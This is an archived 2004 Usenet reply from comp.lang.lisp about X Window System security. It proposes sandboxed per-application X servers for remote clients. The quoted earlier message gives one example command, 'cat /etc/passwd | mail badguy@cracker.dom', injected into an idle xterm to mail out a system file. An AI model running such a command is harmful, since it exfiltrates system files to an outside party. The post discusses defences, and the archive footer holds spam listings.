Re: Ye Old Time Sharing System

From: Tim Bradshaw (tfb+google_at_tfeb.org)
Date: 03/24/04

• Next message: David Steuber: "Re: SETQ vs SETF"
• Previous message: David Steuber: "Code Feedback Wanted (Generating more garbage)"
• In reply to: Rob Warnock: "Re: Ye Old Time Sharing System"
• Next in thread: Artem Baguinski: "Re: Ye Old Time Sharing System"
• Reply: Artem Baguinski: "Re: Ye Old Time Sharing System"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

---

Date: 24 Mar 2004 03:01:39 -0800

rpw3@rpw3.org (Rob Warnock) wrote in message news:<CEKdnRscI-V7of3d3czS-g@speakeasy.net>...
>
> And security, which is almost impossible to get around unless *you*
> securely own both ends of the connection. That is, any host that you
> allow unrestricted connections to your local X server can sniff keystrokes
> (including passwords), insert events into other windows ("Hmmm... there's
> an xterm that's currently iconified and not doing anything. Let's get it
> to do a 'cat /etc/passwd | mail badguy@cracker.dom'"), and other nasty
> stuff.

I think that the right approach to that, since most clients won't be
running X servers for day-to-day life (they're Windows machines in
other words) would be to have some kind of thing where each
application you want to run remotely has its own little X server on
top of which it runs one huge window. Or alternatively it has its own
X server but does one of these clever `rootless' things such that its
possibly-multiple X windows just sit on the native desktop. I think
XFree86 on cygwin can do this now, for instance, and things like
exceed have been able to do it for ever.

Having a per-application server sounds extravagant, but an X server is
probably actually quite small by today's standards, and much of its
memory can probably be shared anyway. You can then ruthlessly
restrict what access this thing has to the native machine.

--tim

---

• Next message: David Steuber: "Re: SETQ vs SETF"
• Previous message: David Steuber: "Code Feedback Wanted (Generating more garbage)"
• In reply to: Rob Warnock: "Re: Ye Old Time Sharing System"
• Next in thread: Artem Baguinski: "Re: Ye Old Time Sharing System"
• Reply: Artem Baguinski: "Re: Ye Old Time Sharing System"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

---

Relevant Pages Re: Ye Old Time Sharing System ... >> you allow unrestricted connections to your local X server can sniff ... > that its possibly-multiple X windows just sit on the native desktop. ... "rootless" and i thought that was the normal behaviour. ... (comp.lang.lisp) SecurityFocus Microsoft Newsletter #154 ... MICROSOFT VULNERABILITY SUMMARY ... ISS RealSecure Server Sensor SSL Denial Of Service Vulnerabi... ... Roger Wilco Remote Server Side Buffer Overrun Vulnerability ... available for Microsoft Windows operating systems. ... (Focus-Microsoft) SecurityFocus Microsoft Newsletter #49 ... Subject: SecurityFocus Microsoft Newsletter #49 ... Microsoft Windows NNTP Denial of Service Vulnerability ... Microsoft IIS SSI Buffer Overrun Privelege Elevation Vulnerability ... Microsoft ISA Server H.323 Memory Leak Denial of Service... ... (Focus-Microsoft) Questions Relating to Administering Windows 2000 Server ... installed the network client on the target computer. ... Sarah has been attempting to install Windows 2000 ... Server for two days. ... Sarah has checked the cables and hard drives. ... (microsoft.public.cert.exam.mcse) pqv¼Ò¹ÚÇÑ ²Þ@mBGRx ... O-009¹Ù¢Ã MS Windows 2000 Datacenter Server -2¸¸¿ø ... Main Application (Borland C++ Builder 6 Enterprise Edition) ... Y-166¢Ã Sex Starved Sluts 1 (Divx) ... (FreeBSD-Security)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(16)